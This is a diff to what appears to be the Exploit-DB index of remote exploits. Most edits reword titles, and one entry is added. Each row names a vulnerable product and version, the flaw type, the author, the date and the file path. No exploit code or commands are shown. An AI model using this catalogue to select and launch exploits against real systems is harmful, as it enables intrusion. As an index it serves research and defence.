@@ -11526,7 +11536,7 @@ id,file,description,date,author,platform,type,port 16845,platforms/linux/remote/16845.rb,"PoPToP - Negative Read Overflow (Metasploit)",2010-11-23,Metasploit,linux,remote,0 16846,platforms/linux/remote/16846.rb,"UoW IMAPd Server - LSUB Buffer Overflow (Metasploit)",2010-03-26,Metasploit,linux,remote,0 16847,platforms/linux/remote/16847.rb,"Squid - NTLM Authenticate Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0 -16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 (Linux) - 'secure' Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0 +16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0 16849,platforms/linux/remote/16849.rb,"MySQL yaSSL (Linux) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,linux,remote,0 16850,platforms/linux/remote/16850.rb,"MySQL - yaSSL CertDecoder::GetName Buffer Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0 16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0 
@@ -11536,11 +11546,11 @@ id,file,description,date,author,platform,type,port 16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0 16859,platforms/linux/remote/16859.rb,"Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0 16860,platforms/lin_x86/remote/16860.rb,"Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,lin_x86,remote,0 -16861,platforms/lin_x86/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)",2010-07-14,Metasploit,lin_x86,remote,0 +16861,platforms/lin_x86/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)",2010-07-14,Metasploit,lin_x86,remote,0 16862,platforms/hardware/remote/16862.rb,"Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,hardware,remote,0 16863,platforms/osx/remote/16863.rb,"AppleFileServer (OSX) - LoginExt PathName Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0 16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 -16865,platforms/osx/remote/16865.rb,"Knox Arkeia Backup Client Type 77 (OSX) - Overflow (Metasploit)",2010-05-09,Metasploit,osx,remote,0 +16865,platforms/osx/remote/16865.rb,"Knox Arkeia Backup Client Type 77 (OSX) - Remote Overflow (Metasploit)",2010-05-09,Metasploit,osx,remote,0 16866,platforms/unix/remote/16866.rb,"Apple Safari - Archive Metadata Command Execution (Metasploit)",2010-09-20,Metasploit,unix,remote,0 16867,platforms/osx/remote/16867.rb,"Apple Mac OSX Software Update - Command Execution (Metasploit)",2010-09-20,Metasploit,osx,remote,0 16868,platforms/hardware/remote/16868.rb,"Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (Metasploit) (2)",2010-09-20,Metasploit,hardware,remote,0 
@@ -11551,9 +11561,9 @@ id,file,description,date,author,platform,type,port 16873,platforms/osx/remote/16873.rb,"Apple QuickTime (Mac OSX) - RTSP Content-Type Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0 -16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0 +16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0 16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0 -16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (BSD x86) - 'trans2open' Overflow (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0 +16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0 16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0 16903,platforms/php/remote/16903.rb,"OpenX - 'banner-edit.php' Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0 
@@ -11589,7 +11599,7 @@ id,file,description,date,author,platform,type,port 17029,platforms/windows/remote/17029.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe OvJavaLocale' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 17030,platforms/windows/remote/17030.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe execvp' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 17031,platforms/linux/remote/17031.rb,"Distributed Ruby - send syscall (Metasploit)",2011-03-23,Metasploit,linux,remote,0 -17034,platforms/windows/remote/17034.py,"Progea Movicon 11 - 'TCPUploadServer' Remote",2011-03-23,"Jeremy Brown",windows,remote,0 +17034,platforms/windows/remote/17034.py,"Progea Movicon 11 - 'TCPUploadServer' Remote File System",2011-03-23,"Jeremy Brown",windows,remote,0 17038,platforms/windows/remote/17038.rb,"HP OpenView Network Node Manager (OV NNM) - 'nnmRptConfig.exe schdParams' Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 17039,platforms/windows/remote/17039.rb,"HP OpenView Network Node Manager (OV NNM) - 'snmpviewer.exe' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,80 17040,platforms/windows/remote/17040.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe ICount' CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 
@@ -11665,7 +11675,7 @@ id,file,description,date,author,platform,type,port 17491,platforms/unix/remote/17491.rb,"vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)",2011-07-05,Metasploit,unix,remote,0 17498,platforms/windows/remote/17498.rb,"Freefloat FTP Server - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,remote,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",hardware,remote,0 -39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - Overflow (SEH) (Metasploit)",2016-04-05,Metasploit,windows,remote,80 +39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - Remote Overflow (SEH) (Metasploit)",2016-04-05,Metasploit,windows,remote,80 39662,platforms/windows/remote/39662.rb,"PCMan FTP Server - 'PUT_ Buffer Overflow (Metasploit)",2016-04-05,Metasploit,windows,remote,21 17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Buffer Overflow (Metasploit)",2011-07-09,Metasploit,windows,remote,0 17517,platforms/windows/remote/17517.txt,"Symantec Backup Exec 12.5 - Man In The Middle",2011-07-09,Nibin,windows,remote,0 
@@ -11705,7 +11715,7 @@ id,file,description,date,author,platform,type,port 17699,platforms/windows/remote/17699.rb,"Symantec System Center Alert Management System - 'xfr.exe' Arbitrary Command Execution (Metasploit)",2011-08-19,Metasploit,windows,remote,0 17700,platforms/windows/remote/17700.rb,"Symantec System Center Alert Management System - 'hndlrsvc.exe' Arbitrary Command Execution (Metasploit)",2011-08-19,Metasploit,windows,remote,0 17719,platforms/windows/remote/17719.rb,"RealVNC - Authentication Bypass (Metasploit)",2011-08-26,Metasploit,windows,remote,0 -17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe'",2011-08-26,"Canberk BOLAT",windows,remote,0 +17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe' Remote Overflow",2011-08-26,"Canberk BOLAT",windows,remote,0 17762,platforms/windows/remote/17762.rb,"Citrix Gateway - ActiveX Control Stack Based Buffer Overflow (Metasploit)",2011-08-31,Metasploit,windows,remote,0 17810,platforms/windows/remote/17810.rb,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)",2011-09-09,"SecPod Research",windows,remote,0 17819,platforms/windows/remote/17819.py,"KnFTP Server - Buffer Overflow",2011-09-12,blake,windows,remote,0 
@@ -11726,7 +11736,7 @@ id,file,description,date,author,platform,type,port 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()'/'SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)",2011-10-13,Metasploit,windows,remote,0 -17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote",2011-10-11,kingcope,windows,remote,0 +17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Command Execution",2011-10-11,kingcope,windows,remote,0 17986,platforms/osx/remote/17986.rb,"Apple Safari - 'file://' Arbitrary Code Execution (Metasploit)",2011-10-17,Metasploit,osx,remote,0 17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit - libxslt Arbitrary File Creation (Metasploit)",2011-10-18,Metasploit,windows,remote,0 18015,platforms/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Buffer Overflow (Metasploit)",2011-10-20,Metasploit,cgi,remote,0 
@@ -11760,7 +11770,7 @@ id,file,description,date,author,platform,type,port 18291,platforms/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS)",2011-12-30,cheffner,hardware,remote,0 18984,platforms/multiple/remote/18984.rb,"Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit)",2012-06-05,Metasploit,multiple,remote,0 18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 - ST 'RRQ' Buffer Overflow",2012-01-10,b33f,windows,remote,0 -18354,platforms/windows/remote/18354.py,"WorldMail IMAPd 3.0 - Overflow (SEH) (Egghunter)",2012-01-12,TheXero,windows,remote,0 +18354,platforms/windows/remote/18354.py,"WorldMail IMAPd 3.0 - Remote Overflow (SEH) (Egghunter)",2012-01-12,TheXero,windows,remote,0 18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport - Remote Command Execution (Metasploit)",2012-01-17,Metasploit,windows,remote,0 18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit)",2012-01-14,Metasploit,windows,remote,0 18367,platforms/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload (Metasploit)",2012-01-14,Metasploit,windows,remote,0 
@@ -11775,7 +11785,7 @@ id,file,description,date,author,platform,type,port 18401,platforms/windows/remote/18401.py,"Savant Web Server 3.1 - Buffer Overflow (Egghunter)",2012-01-21,red-dragon,windows,remote,0 18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow (Metasploit)",2012-04-04,Metasploit,windows,remote,0 18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution Buffer Overflow (Metasploit)",2012-01-26,"Craig Freyman",windows,remote,0 -18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server - 'magentservice.exe' Overflow (Metasploit)",2012-01-27,Metasploit,windows,remote,0 +18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server - 'magentservice.exe' Remote Overflow (Metasploit)",2012-01-27,Metasploit,windows,remote,0 18426,platforms/windows/remote/18426.rb,"Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004) (Metasploit)",2012-01-28,Metasploit,windows,remote,0 18437,platforms/windows/remote/18437.txt,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Remote Code Execution",2012-01-31,Abysssec,windows,remote,0 18442,platforms/multiple/remote/18442.html,"Apache - httpOnly Cookie Disclosure",2012-01-31,pilate,multiple,remote,0 
@@ -11790,7 +11800,7 @@ id,file,description,date,author,platform,type,port 18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (2012) (Metasploit)",2012-02-24,Metasploit,windows,remote,0 18514,platforms/windows/remote/18514.rb,"Trend Micro Control Manger 5.5 - 'CmdProcessor.exe' Stack Buffer Overflow (Metasploit)",2012-02-23,Metasploit,windows,remote,0 18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 - EXEC_CMD Remote Code Execution (Metasploit)",2012-02-25,Metasploit,windows,remote,0 -18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - 'Array.reduceRight()'",2012-02-27,pa_kt,windows,remote,0 +18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Remote Overflow",2012-02-27,pa_kt,windows,remote,0 18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Authenticated (SEH)",2012-02-27,"Craig Freyman",windows,remote,0 18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - 'ipswcom.dll' ActiveX Stack Buffer Overflow (Metasploit)",2012-02-29,Metasploit,windows,remote,0 
@@ -11801,8 +11811,8 @@ id,file,description,date,author,platform,type,port 18555,platforms/windows/remote/18555.txt,"FlashFXP 4.1.8.1701 - Buffer Overflow",2012-03-03,Vulnerability-Lab,windows,remote,0 18557,platforms/windows/remote/18557.rb,"Sysax 5.53 - SSH 'Username' Buffer Overflow (Metasploit)",2012-03-04,Metasploit,windows,remote,0 18703,platforms/windows/remote/18703.txt,"Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite (PoC)",2012-04-05,rgod,windows,remote,0 -18572,platforms/windows/remote/18572.rb,"Adobe Flash Player - '.mp4 cprt' Overflow (Metasploit)",2012-03-08,Metasploit,windows,remote,0 -18619,platforms/multiple/remote/18619.txt,"Apache Tomcat - Account Scanner / 'PUT' Request Remote",2012-03-19,kingcope,multiple,remote,0 +18572,platforms/windows/remote/18572.rb,"Adobe Flash Player - '.mp4 cprt' Remote Overflow (Metasploit)",2012-03-08,Metasploit,windows,remote,0 +18619,platforms/multiple/remote/18619.txt,"Apache Tomcat - Account Scanner / 'PUT' Request Command Execution",2012-03-19,kingcope,multiple,remote,0 18604,platforms/windows/remote/18604.rb,"Netmechanica NetDecision HTTP Server 4.5.1 - Buffer Overflow (Metasploit)",2012-03-15,Metasploit,windows,remote,0 18610,platforms/windows/remote/18610.pl,"Tiny Server 1.1.5 - Arbitrary File Disclosure",2012-03-16,KaHPeSeSe,windows,remote,0 18704,platforms/windows/remote/18704.txt,"Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite (PoC)",2012-04-05,rgod,windows,remote,0 
@@ -11836,7 +11846,7 @@ id,file,description,date,author,platform,type,port 18780,platforms/windows/remote/18780.rb,"Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027) (Metasploit)",2012-04-25,Metasploit,windows,remote,0 18779,platforms/hardware/remote/18779.txt,"RuggedCom Devices - Backdoor Access",2012-04-24,jc,hardware,remote,0 18833,platforms/windows/remote/18833.rb,"SolarWinds Storage Manager 5.1.0 - SQL Injection (Metasploit)",2012-05-04,Metasploit,windows,remote,0 -18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()'",2012-04-30,rgod,windows,remote,0 +18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Code Execution",2012-04-30,rgod,windows,remote,0 18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 - GetObject (Metasploit)",2012-05-01,Metasploit,windows,remote,0 18818,platforms/windows/remote/18818.py,"SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection",2012-05-01,muts,windows,remote,0 18825,platforms/windows/remote/18825.rb,"VideoLAN VLC Media Player 2.0.0 - Mms Stream Handling Buffer Overflow (Metasploit)",2012-05-03,Metasploit,windows,remote,0 
@@ -11870,7 +11880,7 @@ id,file,description,date,author,platform,type,port 19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - 'selection_svc' Remote File Read",1990-08-14,"Peter Shipley",solaris,remote,0 19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS",1992-05-27,anonymous,solaris,remote,0 19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0 -19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - 'pfdisplay.cgi'",1998-04-07,"J.A. Gutierrez",aix,remote,0 +19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - 'pfdisplay.cgi' Code Execution",1998-04-07,"J.A. Gutierrez",aix,remote,0 19069,platforms/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Buffer Overflow",1998-04-14,"Netstat Webmaster",linux,remote,0 19079,platforms/linux/remote/19079.c,"id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 - Command Execution",1998-05-01,"Mark Zielinski",linux,remote,0 19081,platforms/multiple/remote/19081.txt,"Lynx 2.8 - Buffer Overflow",1998-05-03,"Michal Zalewski",multiple,remote,0 
@@ -11943,7 +11953,7 @@ id,file,description,date,author,platform,type,port 19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal",1999-11-04,"Ussr Labs",windows,remote,0 19297,platforms/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 - 'sdrd' File Read",1998-08-05,"Chuck Athey & Jim Garlick",linux,remote,0 19298,platforms/multiple/remote/19298.txt,"SGI IRIX 6.2 - cgi-bin wrap",1997-04-19,"J.A. Gutierrez",multiple,remote,0 -19299,platforms/multiple/remote/19299.txt,"SGI IRIX 6.3 - cgi-bin 'webdist.cgi'",1997-05-06,anonymous,multiple,remote,0 +19299,platforms/multiple/remote/19299.txt,"SGI IRIX 6.3 - cgi-bin 'webdist.cgi' Command Execution",1997-05-06,anonymous,multiple,remote,0 19303,platforms/multiple/remote/19303.txt,"SGI IRIX 6.4 - cgi-bin handler",1997-06-16,"Razvan Dragomirescu",multiple,remote,0 19316,platforms/irix/remote/19316.c,"SGI IRIX 6.5.2 - 'nsd' Information Gathering",1999-05-31,"Jefferson Ogata",irix,remote,0 19322,platforms/windows/remote/19322.rb,"Apple iTunes 10.6.1.7 - Extended m3u Stack Buffer Overflow (Metasploit)",2012-06-21,Rh0,windows,remote,0 
@@ -11970,14 +11980,14 @@ id,file,description,date,author,platform,type,port 19458,platforms/linux/remote/19458.c,"Linux Kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing",1999-07-31,Nergal,linux,remote,0 19459,platforms/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 - Buffer Overflow",1999-08-13,"jduck & stranjer",multiple,remote,0 19466,platforms/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Information Disclosure",1999-08-18,"Gregory Duchemin",multiple,remote,0 -19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5 - ActiveX 'Object for constructing type libraries for scriptlets'",1999-08-21,"Georgi Guninski",windows,remote,0 +19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptlets File Write",1999-08-21,"Georgi Guninski",windows,remote,0 19475,platforms/linux/remote/19475.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0 19476,platforms/linux/remote/19476.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote,0 19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (1)",1999-08-31,Taeho,unix,remote,0 19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0 19484,platforms/windows/remote/19484.rb,"HP Data Protector - Create New Folder Buffer Overflow (Metasploit)",2012-07-01,Metasploit,windows,remote,3817 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 - EMBED Buffer Overflow",1999-09-02,"R00t Zer0",windows,remote,0 -19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4/5 - ActiveX 'Eyedog'",1999-08-21,"Shane Hird's",windows,remote,0 +19487,platforms/windows/remote/19487.txt,"Microsoft Internet 
Explorer 4/5 - ActiveX 'Eyedog' Remote Overflow",1999-08-21,"Shane Hird's",windows,remote,0 19490,platforms/windows/remote/19490.txt,"Microsoft Internet Explorer 4.0.1/5 - Import/Export Favorites",1999-09-10,"Georgi Guninski",windows,remote,0 19491,platforms/windows/remote/19491.txt,"BindView HackerShield 1.0/1.1 - HackerShield AgentAdmin Password",1999-09-10,anonymous,windows,remote,0 19492,platforms/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",multiple,remote,0 @@ -12037,7 +12047,7 @@ id,file,description,date,author,platform,type,port 19621,platforms/windows/remote/19621.c,"Admiral Systems EmailClub 1.0.0.5 - Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19622,platforms/windows/remote/19622.c,"Antelope Software W4-Server 2.6 a/Win32 - 'Cgitest.exe' Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19623,platforms/windows/remote/19623.c,"International TeleCommunications WebBBS 2.13 - login & Password Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 -19625,platforms/windows/remote/19625.py,"ALLMediaServer 0.8 - Overflow (SEH)",2012-07-06,"motaz reda",windows,remote,888 +19625,platforms/windows/remote/19625.py,"ALLMediaServer 0.8 - Remote Overflow (SEH)",2012-07-06,"motaz reda",windows,remote,888 19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",hardware,remote,0 19634,platforms/linux/remote/19634.c,"ETL Delegate 5.9.x/6.0.x - Buffer Overflow",1999-11-13,scut,linux,remote,0 19637,platforms/windows/remote/19637.txt,"Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4.0) - XML HTTP Redirect",1999-11-22,"Georgi Guninksi",windows,remote,0 
@@ -12272,7 +12282,7 @@ id,file,description,date,author,platform,type,port 20231,platforms/hardware/remote/20231.txt,"Cisco PIX Firewall 4.x/5.x - SMTP Content Filtering Evasion",2000-09-19,"Lincoln Yeoh",hardware,remote,0 20234,platforms/multiple/remote/20234.txt,"extent technologies rbs isp 2.5 - Directory Traversal",2000-09-21,anon,multiple,remote,8002 20235,platforms/windows/remote/20235.pl,"Cisco Secure ACS for Windows NT 2.42 - Buffer Overflow",2000-09-21,blackangels,windows,remote,0 -20236,platforms/linux/remote/20236.txt,"S.u.S.E. Linux 6.3/6.4 - Installed Package Disclosure",2000-09-21,t0maszek,linux,remote,0 +20236,platforms/linux/remote/20236.txt,"SuSE Linux 6.3/6.4 - Installed Package Disclosure",2000-09-21,t0maszek,linux,remote,0 20237,platforms/linux/remote/20237.c,"UoW Pine 4.0.4/4.10/4.21 - 'From:' Buffer Overflow",2000-09-23,Arkane,linux,remote,0 20238,platforms/cgi/remote/20238.txt,"Alabanza Control Panel 3.0 - Domain Modification",2000-09-24,"Weihan Leow",cgi,remote,0 20240,platforms/windows/remote/20240.txt,"Microsoft Windows Media Player 7 - Embedded OCX Control",2000-09-26,"Ussr Labs",windows,remote,0 
@@ -12366,7 +12376,7 @@ id,file,description,date,author,platform,type,port 20448,platforms/cgi/remote/20448.txt,"Novell NetWare Web Server 2.x - convert.bas",1996-07-03,"TTT Group",cgi,remote,0 20449,platforms/unix/remote/20449.txt,"GlimpseHTTP 1.0/2.0 / WebGlimpse 1.0 - Piped Command",1996-07-03,"Razvan Dragomirescu",unix,remote,0 20450,platforms/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 - Password Disclosure",2000-11-30,"Michael R. Rudel",multiple,remote,0 -20459,platforms/windows/remote/20459.html,"Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE'",2000-12-01,Key,windows,remote,0 +20459,platforms/windows/remote/20459.html,"Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Remote File Upload",2000-12-01,Key,windows,remote,0 20460,platforms/windows/remote/20460.txt,"Microsoft Windows NT 4.0 - Phonebook Server Buffer Overflow",2000-12-04,"Alberto Solino",windows,remote,0 20461,platforms/windows/remote/20461.txt,"Cat Soft Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0 20462,platforms/unix/remote/20462.txt,"Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution",1998-08-04,Tom,unix,remote,0 
@@ -13460,6 +13470,7 @@ id,file,description,date,author,platform,type,port 23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Authenticated Remote Command Execution",2012-12-29,xistence,hardware,remote,0 23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W - ActiveX Buffer Overflow (Metasploit)",2012-12-31,Metasploit,windows,remote,0 23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow (Metasploit)",2012-12-31,Metasploit,windows,remote,0 +23740,platforms/linux/remote/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,remote,0 23741,platforms/windows/remote/23741.c,"Proxy-Pro Professional GateKeeper 4.7 Web Proxy - Buffer Overrun",2004-02-23,kralor,windows,remote,0 23751,platforms/windows/remote/23751.txt,"Apache Cygwin 1.3.x/2.0.x - Directory Traversal",2004-02-24,"Jeremy Bae",windows,remote,0 23754,platforms/windows/remote/23754.rb,"Microsoft Internet Explorer - CDwnBindInfo Object Use-After-Free (Metasploit)",2012-12-31,Metasploit,windows,remote,0 
@@ -13470,7 +13481,7 @@ id,file,description,date,author,platform,type,port 23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage",2004-02-27,iDefense,windows,remote,0 23768,platforms/windows/remote/23768.txt,"Microsoft Internet Explorer 6 - window.open Media Bar Cross-Zone Scripting",2003-09-11,Jelmer,windows,remote,0 23771,platforms/linux/remote/23771.pl,"GNU Anubis 3.6.x/3.9.x - Multiple Format String Vulnerabilities",2004-03-01,"Ulf Harnhammar",linux,remote,0 -23772,platforms/linux/remote/23772.c,"GNU Anubis 3.6.x/3.9.x - 'auth.c auth_ident()' Overflow",2004-03-01,CMN,linux,remote,0 +23772,platforms/linux/remote/23772.c,"GNU Anubis 3.6.x/3.9.x - 'auth.c auth_ident()' Remote Overflow",2004-03-01,CMN,linux,remote,0 23776,platforms/windows/remote/23776.txt,"Software602 602Pro LAN Suite - Web Mail Cross-Site Scripting",2004-03-01,"Rafel Ivgi The-Insider",windows,remote,0 23777,platforms/linux/remote/23777.txt,"Squid Proxy 2.4/2.5 - NULL URL Character Unauthorized Access",2004-03-01,"Mitch Adair",linux,remote,0 23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer - CButton Object Use-After-Free (Metasploit)",2013-01-02,Metasploit,windows,remote,0 
